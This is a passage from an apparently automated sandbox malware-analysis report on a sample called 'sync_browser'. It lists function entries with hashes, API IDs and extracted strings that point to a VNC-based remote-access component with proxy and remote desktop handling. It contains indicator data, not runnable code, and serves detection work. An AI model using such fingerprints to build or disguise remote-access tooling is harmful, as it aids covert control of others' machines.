                                                                    • Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                    • Instruction Fuzzy Hash: 2F5126A2A19A9A81FB15DB25A8543FC2398EF85748F44413BED4EC7695DF3DE12BC300
                                                                    Function 00007FF6DC0CB030 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
                                                                    • String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
                                                                    • API String ID: 1123868200-453874877
                                                                    • Opcode ID: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                    • Instruction ID: cd22cdb9aaffe806b15e073170939a4483a5ff86f155ff7673b001fd2b7daa8b
                                                                    • Opcode Fuzzy Hash: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                    • Instruction Fuzzy Hash: A051CF21A0968AC5EF219B14D9402BD67A4FF94B88F480137DA0DC77A6EF3DE527C750
                                                                    Function 00007FF6DC0D4970 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 77threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
                                                                    • String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
                                                                    • API String ID: 1907048692-1814171851
                                                                    • Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                    • Instruction ID: aa293e3b3ec53da8abd3189e5a32d3f01b817f150a87e6fa05ffac688e11f0e4
                                                                    • Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                    • Instruction Fuzzy Hash: 3E313E61A18A9A81FB10DB65AC046ED63A8FFC9744F844133D94EC7664DF3DE527C740
                                                                    Function 00007FF6DC0F5100 Relevance: 22.7, APIs: 15, Instructions: 242COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID:
                                                                    • API String ID: 1881577244-0
                                                                    • Opcode ID: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                    • Instruction ID: a5419783c4152ea16a065edcd338dc5dd18234d8516d68cf746b8dfb484f51dc
                                                                    • Opcode Fuzzy Hash: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                    • Instruction Fuzzy Hash: 3AA1D272A0869A8AEB208F15E844B6E7755FB84B98F101136DE4ED3B94DF3DE466C700
                                                                    Function 00007FF6DC0D00D0 Relevance: 22.6, APIs: 15, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Combine$DeleteObjectRectfree$Offset$Create
                                                                    • String ID:
                                                                    • API String ID: 2677898628-0
                                                                    • Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                    • Instruction ID: 8977f133a0917dd2bcc38d70ab54040fd981618b223d2b8fe0b8eef335b5e740
                                                                    • Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                    • Instruction Fuzzy Hash: 19411776B1492689EB10DBA6EC559AD3730FB85B98F404132DE2E97AA8CF28D456C300
                                                                    Function 00007FF6DC0E5958 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$Leave
                                                                    • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2801635615-1537001432
                                                                    • Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                    • Instruction ID: 3f69c797c29bf2627cbe108691e3cdc443d79329cddd7371fa4c3dcd73262fe1
                                                                    • Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                    • Instruction Fuzzy Hash: 9DD1C122A086D585FB50DB65C458BFE2BA8EB85B84F194137CA4DC77A1CF3AD466CB00
                                                                    Function 00007FF6DC12D890 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
                                                                    • API String ID: 3168844106-4245644328
                                                                    • Opcode ID: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                    • Instruction ID: 58daed876a7c4a17a22216fb9bb8cb0bb3af4db4a10de436d9604d112f8f95ec
                                                                    • Opcode Fuzzy Hash: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                    • Instruction Fuzzy Hash: 6C61B42590CA9A86EB749B24E8557BDA3A4FB45B54F140232DA5EC37E4DF3CE427C700
                                                                    Function 00007FF6DC118080 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 85libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                                    • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                                    • API String ID: 1719662965-904825817
                                                                    • Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                    • Instruction ID: 65286481c7981eddb09e1e6c9a7671417a9d0317598fd08b2c9cf6118f6ac987
                                                                    • Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                    • Instruction Fuzzy Hash: 9F416C21A08AAA85FA209B25AC547AD23A8BF99790F444133DD5DC77A5DE3CE127C700
                                                                    Function 00007FF6DC0F11E0 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                    • String ID:
                                                                    • API String ID: 4219907860-0
                                                                    • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                    • Instruction ID: 90e69dae3c09415482d3bc64ad303a03a7306bdda2d330443f2bd44712b684da
                                                                    • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                    • Instruction Fuzzy Hash: 2C4174216186968AEB209F25EC447AE7364FB88BD8F005136EE5E87B54DF7CD156CB00
                                                                    Function 00007FF6DC0D1640 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfile$FileModuleNameStringVersion
                                                                    • String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
                                                                    • API String ID: 769895750-1251308945
                                                                    • Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                    • Instruction ID: 04aaaa15ff2c0815fadeaf8c2433237e76598073217cec2eb53305a490984012
                                                                    • Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
                                                                    • Instruction Fuzzy Hash: E6518C7560869A85EA108B60A8406AD77A0FB847B4F448337EA7DC3AD5CF3CD52BCB10
                                                                    Function 00007FF6DC0F1AE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$Free$AddressLoadProc
                                                                    • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                                    • API String ID: 1386263645-671781545
                                                                    • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                    • Instruction ID: eec5bffefd499fe81e55b52969323198993c2dbda5ec26ec71f42bf0df2a4ef2
                                                                    • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                    • Instruction Fuzzy Hash: 16416B3190C60A8AFB698F21E86433C22A1EB45B58F544136C91DD62D4EF7EE4A78B45
                                                                    Function 00007FF6DC0CB310 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                                    • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                                    • API String ID: 3057866299-2798169553
                                                                    • Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                    • Instruction ID: be07c0a412ca76f3833c31f3b8fa882aa1652073e1001c5b1267191024fc208e
                                                                    • Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                    • Instruction Fuzzy Hash: 2E317E20E1EA5A80FD549B14DA416BC63A4AF54704F480437DA0CC62A2FF2DE97BC750
                                                                    Function 00007FF6DC0D3A60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 72registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$CreateOpenQueryValueVersion
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                    • API String ID: 1076069355-3579764778
                                                                    • Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                    • Instruction ID: 67ef9a1807350f0c9a59fa59eab74c6a97f25db44610361fb92caec0db3ab396
                                                                    • Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                    • Instruction Fuzzy Hash: 14315772A08B9685EB608B10F8553AEB364FBC9754F800136E69D82A54DF7CD12ACF40
                                                                    Function 00007FF6DC0EF790 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 63windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
